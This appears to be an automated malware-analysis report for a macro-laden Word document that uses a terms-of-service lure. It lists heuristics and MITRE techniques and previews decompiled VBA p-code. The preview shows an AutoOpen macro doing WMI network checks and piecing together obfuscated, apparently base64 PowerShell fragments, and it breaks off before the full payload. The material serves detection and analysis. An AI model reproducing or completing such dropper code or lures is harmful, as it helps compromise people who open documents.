MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Word document that uses a lure to convince the user to enable macros, specifically mentioning updated terms of service. The AutoOpen macro is triggered upon opening, which uses WMI to query network status, likely as a precursor to downloading and executing a second-stage payload. The embedded VBA code indicates a malicious intent to execute arbitrary code.
Heuristics 5
-
VBA project contains no executable statements low 1 related finding OLE_VBA_MACROSDocument contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://help.github.com/articles/github-terms-of-service-draft In document text (OLE body)
- https://help.github.com/articles/github-terms-of-service/In document text (OLE body)
- https://github.com/contact/terms-of-serviceIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 74323 bytes |
SHA-256: 88ceba162858783a843cd80ea9d96f7d75e771afb465656f5a3ba10766b54489 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' Processing file: /opt/analyzer/scan_staging/60687642a1804fa3861960c27d91d382.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1127 bytes ' Macros/VBA/module1 - 54462 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' SetStmt ' LitStr 0x004A "Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True" ' LitStr 0x0009 "winmgmts:" ' ArgsLd GetObject 0x0001 ' ArgsMemLd Get 0x0001 ' Set ImogenPhotobiologic ' Line #3: ' StartWithExpr ' Ld ImogenPhotobiologic ' With ' Line #4: ' Debug ' PrintObj ' LitStr 0x000D "Status Code: " ' MemLdWith StatusCode ' Concat ' PrintItemNL ' Line #5: ' MemLdWith StatusCode ' LitDI2 0x0000 ' Eq ' IfBlock ' Line #6: ' LitVarSpecial (False) ' St EtzelUnpolishedness ' Line #7: ' MemLdWith StatusCode ' LitDI2 0x0000 ' Gt ' ElseIfBlock ' Line #8: ' LitVarSpecial (False) ' St EtzelUnpolishedness ' Line #9: ' ElseBlock ' QuoteRem 0x000D 0x0011 "No DNS Resolution" ' Line #10: ' LitVarSpecial (True) ' St EtzelUnpolishedness ' Line #11: ' EndIfBlock ' Line #12: ' EndWith ' Line #13: ' Line #14: ' SetStmt ' LitStr 0x001A "Win32_PingStatus.Address='" ' LitStr 0x000A "userdomain" ' ArgsLd Environ$ 0x0001 ' Concat ' LitStr 0x001A "',ResolveAddressNames=True" ' Concat ' LitStr 0x0009 "winmgmts:" ' ArgsLd GetObject 0x0001 ' ArgsMemLd Get 0x0001 ' Set ImogenPhotobiologic ' Line #15: ' StartWithExpr ' Ld ImogenPhotobiologic ' With ' Line #16: ' Debug ' PrintObj ' LitStr 0x000D "Status Code: " ' MemLdWith StatusCode ' Concat ' PrintItemNL ' Line #17: ' Debug ' PrintObj ' LitStr 0x0009 "Address: " ' MemLdWith Address ' Concat ' PrintItemNL ' Line #18: ' MemLdWith StatusCode ' LitDI2 0x0000 ' Eq ' IfBlock ' Line #19: ' LitVarSpecial (True) ' St VeraPostmeridian ' Line #20: ' MemLdWith StatusCode ' LitDI2 0x0000 ' Gt ' ElseIfBlock ' Line #21: ' LitVarSpecial (False) ' St VeraPostmeridian ' Line #22: ' ElseBlock ' QuoteRem 0x000D 0x0011 "No DNS Resolution" ' Line #23: ' LitVarSpecial (False) ' St VeraPostmeridian ' Line #24: ' EndIfBlock ' Line #25: ' EndWith ' Line #26: ' Line #27: ' Ld EtzelUnpolishedness ' LitVarSpecial (True) ' Eq ' Ld VeraPostmeridian ' LitVarSpecial (True) ' Eq ' And ' IfBlock ' Line #28: ' Dim ' VarDefn UnstifflyGruesomest (As String) ' Line #29: ' LitStr 0x0001 "w" ' LitStr 0x0001 "u" ' LitStr 0x0001 "o" ' LitStr 0x0001 "p" ' LitStr 0x0001 "e" ' LitStr 0x0001 "y" ' LitStr 0x0001 "b" ' LitStr 0x0001 "a" ' LitStr 0x0001 "t" ' LitStr 0x0001 "x" ' LitStr 0x0001 "-" ' LitStr 0x0001 "s" ' LitStr 0x0001 "d" ' LitStr 0x0001 "c" ' LitStr 0x0001 " " ' LitStr 0x0001 "h" ' LitStr 0x0001 "r" ' LitStr 0x0001 "i" ' LitStr 0x0001 "n" ' LitStr 0x0001 "l" ' ArgsArray Array 0x0014 ' St OutbowlTega ' Line #30: ' Dim ' VarDefn LucierDruidism (As String) ' Line #31: ' LitStr 0x0009 "SQBmACgAJ" ' St LucierDruidism ' Line #32: ' Dim ' VarDefn TetanineSpans (As String) ' Line #33: ' LitStr 0x0007 "ABQAFMA" ' St TetanineSpans ' Line #34: ' Line #35: ' Dim ' VarDefn ChancellorsvilleCalabresi (As String) ' Line #36: ' LitStr 0x000B "VgBlAHIAcwB" ' St ChancellorsvilleCalabresi ' Line #37: ' Line #38: ' Line #39: ' Dim ' VarDefn AutotomiesDemoniacally (As String) ' Line #40: ' LitStr 0x0013 "JAE8AbgBUAGEAYgBMAG" ' St AutotomiesDemoniacally ' Line #41: ' Line #42: ' Dim ' VarDefn ParcellingRubification (As String) ' Line #43: ' LitStr 0x0013 "UALgBQAFMAVgBlAFIAU" ' St ParcellingRubification ' Line #44: ' Ld PreinsultDreck ' Ld LucierDruidism ' Concat ' Ld TetanineSpans ' Concat ' Ld Cha ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.